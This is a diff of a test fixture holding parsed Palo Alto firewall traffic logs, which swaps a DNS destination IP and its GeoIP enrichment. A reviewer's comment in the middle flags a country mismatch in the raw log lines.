@@ -3847,7 +3817,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 18534, + "log.offset": 18654, "network.application": "ssl", "network.bytes": 905, "network.community_id": [ @@ -3921,14 +3891,7 @@ "client.packets": 15, "client.port": 59650, "destination.address": "172.217.23.174", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", "destination.bytes": 33437, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "172.217.23.174", "destination.nat.ip": "172.217.23.174", "destination.nat.port": 443, 
@@ -3957,7 +3920,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 19037, + "log.offset": 19157, "network.application": "google-base", "network.bytes": 35266, "network.community_id": [ @@ -4032,14 +3995,7 @@ "client.packets": 1, "client.port": 35869, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 235, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 443, @@ -4067,7 +4023,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 19589, + "log.offset": 19709, "network.application": "insufficient-data", "network.bytes": 333, "network.community_id": [ 
@@ -4141,17 +4097,18 @@ "client.nat.port": 17695, "client.packets": 1, "client.port": 35510, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 129, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -4165,7 +4122,7 @@ "event.end": "2020-03-27T09:57:02.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,6975,1,35510,53,17695,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:57:02,0,any,0,2825874,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:02.000+01:00", "event.timezone": "+01:00", @@ -4177,12 +4134,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 20126, + "log.offset": 20246, "network.application": "dns", "network.bytes": 226, "network.community_id": [ - "1:7NskKvATy4Z2zqSvMm5oTmaU8lE=", - "1:mhzPP3Jf6GGCKiSiLRFxS+1O+P8=" + "1:FBVCqQLFAWHpIHBAg0Vd4AZK17k=", + "1:vj2wrlQh2kvEm/IBJH48wMZvt9w=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -4199,12 +4156,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "6975", - "panw.panos.network.nat.community_id": "1:7NskKvATy4Z2zqSvMm5oTmaU8lE=", + "panw.panos.network.nat.community_id": "1:FBVCqQLFAWHpIHBAg0Vd4AZK17k=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825874, "panw.panos.source.interface": "ethernet1/3", @@ -4220,13 +4177,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 129, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -4251,17 +4208,18 @@ "client.nat.port": 45148, "client.packets": 1, "client.port": 40766, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 130, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -4275,7 +4233,7 @@ "event.end": "2020-03-27T09:57:02.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:31+01:00 PA-VM - - - - 1,2020/03/27 09:57:31,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:31,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:31,7666,1,40766,53,45148,53,0x400064,udp,allow,228,98,130,2,2020/03/27 09:57:02,0,any,0,2825875,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:02.000+01:00", "event.timezone": "+01:00", @@ -4287,12 +4245,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 20633, + "log.offset": 20763, "network.application": "dns", "network.bytes": 228, "network.community_id": [ - "1:/DGROGpCvGwdwpEooDiBdsS9YB8=", - "1:hGEE8bbZRooRdQ8XY9O8pxn6TDQ=" + "1:8nqLtOa6TgbO0D6eev2JSx3WR20=", + "1:wLkErNt78Sol1InHduV6YDnYwck=" ], "network.direction": "unknown", "network.packets": 2, 
@@ -4309,12 +4267,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "7666", - "panw.panos.network.nat.community_id": "1:/DGROGpCvGwdwpEooDiBdsS9YB8=", + "panw.panos.network.nat.community_id": "1:8nqLtOa6TgbO0D6eev2JSx3WR20=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825875, "panw.panos.source.interface": "ethernet1/3", @@ -4330,13 +4288,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 130, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, @@ -4362,14 +4320,7 @@ "client.packets": 1, "client.port": 54348, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 657, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 443, @@ -4397,7 +4348,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 21140, + "log.offset": 21280, "network.application": "dnscrypt", "network.bytes": 895, "network.community_id": [ 
@@ -4500,7 +4451,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 21668, + "log.offset": 21808, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ @@ -4574,14 +4525,7 @@ "client.packets": 1, "client.port": 46538, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 538, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 443, @@ -4609,7 +4553,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 22167, + "log.offset": 22307, "network.application": "dnscrypt", "network.bytes": 968, "network.community_id": [ @@ -4712,7 +4656,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 22694, + "log.offset": 22834, "network.application": "ssl", "network.bytes": 19301, "network.community_id": [ @@ -4786,14 +4730,7 @@ "client.packets": 1, "client.port": 55300, "destination.address": "208.67.222.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 218, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.222", "destination.nat.ip": "208.67.222.222", "destination.nat.port": 443, 
@@ -4821,7 +4758,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 23230, + "log.offset": 23370, "network.application": "dnscrypt", "network.bytes": 584, "network.community_id": [ @@ -4896,14 +4833,7 @@ "client.packets": 1, "client.port": 55301, "destination.address": "208.67.222.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 379, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.222", "destination.nat.ip": "208.67.222.222", "destination.nat.port": 443, @@ -4931,7 +4861,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 23756, + "log.offset": 23896, "network.application": "dnscrypt", "network.bytes": 681, "network.community_id": [ @@ -5034,7 +4964,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 24282, + "log.offset": 24422, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ @@ -5108,14 +5038,7 @@ "client.packets": 1, "client.port": 43393, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 133, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 443, 
@@ -5143,7 +5066,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 24789, + "log.offset": 24929, "network.application": "insufficient-data", "network.bytes": 231, "network.community_id": [ @@ -5218,14 +5141,7 @@ "client.packets": 1, "client.port": 50971, "destination.address": "208.67.222.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 133, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.222", "destination.nat.ip": "208.67.222.222", "destination.nat.port": 443, @@ -5253,7 +5169,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 25326, + "log.offset": 25466, "network.application": "insufficient-data", "network.bytes": 231, "network.community_id": [ @@ -5357,7 +5273,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 25863, + "log.offset": 26003, "network.application": "google-base", "network.bytes": 4694, "network.community_id": [ @@ -5431,14 +5347,7 @@ "client.packets": 1, "client.port": 51536, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 91, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 53, 
@@ -5466,7 +5375,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 26406, + "log.offset": 26546, "network.application": "dns", "network.bytes": 166, "network.community_id": [ @@ -5541,14 +5450,7 @@ "client.packets": 1, "client.port": 47099, "destination.address": "208.67.222.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 133, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.222.220", "destination.nat.ip": "208.67.222.220", "destination.nat.port": 443, @@ -5576,7 +5478,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 26927, + "log.offset": 27067, "network.application": "insufficient-data", "network.bytes": 231, "network.community_id": [ @@ -5651,14 +5553,7 @@ "client.packets": 1, "client.port": 38028, "destination.address": "208.67.220.222", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 133, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.222", "destination.nat.ip": "208.67.220.222", "destination.nat.port": 443, @@ -5686,7 +5581,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 27464, + "log.offset": 27604, "network.application": "insufficient-data", "network.bytes": 231, "network.community_id": [ 
@@ -5761,14 +5656,7 @@ "client.packets": 1, "client.port": 39688, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 131, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 53, @@ -5796,7 +5684,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 28002, + "log.offset": 28142, "network.application": "dns", "network.bytes": 212, "network.community_id": [ @@ -5871,14 +5759,7 @@ "client.packets": 2, "client.port": 56601, "destination.address": "208.67.220.220", - "destination.as.number": 36692, - "destination.as.organization.name": "Cisco OpenDNS, LLC", "destination.bytes": 212, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, "destination.ip": "208.67.220.220", "destination.nat.ip": "208.67.220.220", "destination.nat.port": 53, @@ -5906,7 +5787,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 28523, + "log.offset": 28663, "network.application": "dns", "network.bytes": 362, "network.community_id": [ @@ -6009,7 +5890,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 29044, + "log.offset": 29184, "network.application": "ssl", "network.bytes": 763, "network.community_id": [ 
@@ -6112,7 +5993,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 29550, + "log.offset": 29690, "network.application": "web-browsing", "network.bytes": 4694, "network.community_id": [ @@ -6215,7 +6096,7 @@ "input.type": "log", "labels.nat_translated": true, "labels.ssl_decrypted": true, - "log.offset": 30071, + "log.offset": 30211, "network.application": "google-base", "network.bytes": 7054, "network.community_id": [ @@ -6317,7 +6198,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 30618, + "log.offset": 30758, "network.application": "ssl", "network.bytes": 905, "network.community_id": [ @@ -6419,7 +6300,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 31121, + "log.offset": 31261, "network.application": "ssl", "network.bytes": 839, "network.community_id": [ @@ -6521,7 +6402,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 31624, + "log.offset": 31764, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ @@ -6623,7 +6504,7 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 32124, + "log.offset": 32264, "network.application": "ssl", "network.bytes": 575, "network.community_id": [ 
@@ -6696,17 +6577,18 @@ "client.nat.port": 28825, "client.packets": 1, "client.port": 60824, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 129, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 1, "destination.port": 53, 
@@ -6720,7 +6602,7 @@ "event.end": "2020-03-27T09:56:57.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "527 <14>1 2020-03-27T09:57:26+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,end,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,8108,1,60824,53,28825,53,0x400064,udp,allow,226,97,129,2,2020/03/27 09:56:57,0,any,0,2825848,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:56:57.000+01:00", "event.timezone": "+01:00", @@ -6732,12 +6614,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 32624, + "log.offset": 32764, "network.application": "dns", "network.bytes": 226, "network.community_id": [ - "1:A2+HwT4AIF06UL20njpr+jOEHbA=", - "1:EcekfyB2F1ffbgDiS52p2Ave8cw=" + "1:QO0fcVmrRB7hqxqPZOyjNVIPNMA=", + "1:t6W2RtxCtwPyDggireHusa67LPY=" ], "network.direction": "unknown", "network.packets": 2, 
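Review bot: The rewritten `event.original` in this hunk still carries `United States` in the PAN-OS destination-location column (`...,192.168.0.0-192.168.255.255,United States,...`) while the GeoIP-derived fields for the same event in the preceding hunk now say `destination.geo.country_name: "China"`, so the fixture describes a flow whose firewall-reported location contradicts its enrichment. If the panos pipeline maps that column to a `panw.panos.*` or `destination.*` field (the pipeline is not visible here), the expected output is internally inconsistent; if it does not, the raw log line should still be edited to `...,192.168.0.0-192.168.255.255,China,...` so the sample stays plausible, and the `log.offset` values regenerated since the line length changes. The move from `8.8.8.8` to `175.16.199.1` presumably targets an address present in the MaxMind test database so enrichment is deterministic, which also explains the dropped `destination.as.*`/`destination.geo.*` fields for the OpenDNS resolvers; note that `175.16.199.0/24` is a real routable APNIC block, not an RFC 5737 documentation range, so it belongs only in fixtures and never in anything that emits traffic. The same location mismatch applies to every other `event.original` rewritten in this file.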
@@ -6754,12 +6636,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "aged-out", "panw.panos.flow_id": "8108", - "panw.panos.network.nat.community_id": "1:EcekfyB2F1ffbgDiS52p2Ave8cw=", + "panw.panos.network.nat.community_id": "1:t6W2RtxCtwPyDggireHusa67LPY=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825848, "panw.panos.source.interface": "ethernet1/3", @@ -6775,13 +6657,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 129, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 1, "server.port": 53, 
@@ -6806,17 +6688,18 @@ "client.nat.port": 29739, "client.packets": 1, "client.port": 42403, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
@@ -6830,7 +6713,7 @@ "event.end": "2020-03-27T09:57:27.000+01:00", "event.kind": "event", "event.module": "panw", - "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,8.8.8.8,0.0.0.0,8.8.8.8,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", + "event.original": "521 <14>1 2020-03-27T09:57:27+01:00 PA-VM - - - - 1,2020/03/27 09:57:26,015351000043722,TRAFFIC,start,2305,2020/03/27 09:57:26,192.168.2.4,175.16.199.1,0.0.0.0,175.16.199.1,Internet Access,,,dns,vsys1,Clients,External,ethernet1/3,ethernet1/1,Default,2020/03/27 09:57:26,7601,1,42403,53,29739,53,0x400000,udp,allow,97,97,0,1,2020/03/27 09:57:27,0,any,0,2825849,0x0,192.168.0.0-192.168.255.255,United States,0,1,0,n/a,0,0,0,0,,PA-VM,from-policy,,,0,,0,,N/A,0,0,0,0,d0422b3b-8522-4916-8b97-524c32780f90,0,0,,,,,,,", "event.outcome": "success", "event.start": "2020-03-27T09:57:27.000+01:00", "event.timezone": "+01:00", @@ -6842,12 +6725,12 @@ "fileset.name": "panos", "input.type": "log", "labels.nat_translated": true, - "log.offset": 33131, + "log.offset": 33281, "network.application": "dns", "network.bytes": 97, "network.community_id": [ - "1:SYwY/Oxa91Bxljqt7vOeKmkB6Tc=", - "1:kYnMEX654pUoP/CF8LWGKoQ5Bts=" + "1:PIx6LwSPeBDAwHH76WeCFFgGd/o=", + "1:pW9XWgM8GVh/uQ+kJhyhgsKan6U=" ], "network.direction": "unknown", "network.packets": 1, 
@@ -6864,12 +6747,12 @@ "observer.vendor": "Palo Alto Networks", "panw.panos.action": "allow", "panw.panos.destination.interface": "ethernet1/1", - "panw.panos.destination.nat.ip": "8.8.8.8", + "panw.panos.destination.nat.ip": "175.16.199.1", "panw.panos.destination.nat.port": 53, "panw.panos.destination.zone": "External", "panw.panos.endreason": "n/a", "panw.panos.flow_id": "7601", - "panw.panos.network.nat.community_id": "1:kYnMEX654pUoP/CF8LWGKoQ5Bts=", + "panw.panos.network.nat.community_id": "1:PIx6LwSPeBDAwHH76WeCFFgGd/o=", "panw.panos.ruleset": "Internet Access", "panw.panos.sequence_number": 2825849, "panw.panos.source.interface": "ethernet1/3", @@ -6885,13 +6768,13 @@ ], "related.ip": [ "0.0.0.0", - "192.168.2.4", - "8.8.8.8" + "175.16.199.1", + "192.168.2.4" ], "rule.name": "Internet Access", "server.bytes": 0, - "server.ip": "8.8.8.8", - "server.nat.ip": "8.8.8.8", + "server.ip": "175.16.199.1", + "server.nat.ip": "175.16.199.1", "server.nat.port": 53, "server.packets": 0, "server.port": 53, 
@@ -6916,17 +6799,18 @@ "client.nat.port": 24414, "client.packets": 1, "client.port": 35615, - "destination.address": "8.8.8.8", - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", + "destination.address": "175.16.199.1", "destination.bytes": 0, - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.8.8", - "destination.nat.ip": "8.8.8.8", + "destination.geo.city_name": "Changchun", + "destination.geo.continent_name": "Asia", + "destination.geo.country_iso_code": "CN", + "destination.geo.country_name": "China", + "destination.geo.location.lat": 43.88, + "destination.geo.location.lon": 125.3228, + "destination.geo.region_iso_code": "CN-22", + "destination.geo.region_name": "Jilin Sheng", + "destination.ip": "175.16.199.1", + "destination.nat.ip": "175.16.199.1", "destination.nat.port": 53, "destination.packets": 0, "destination.port": 53, 
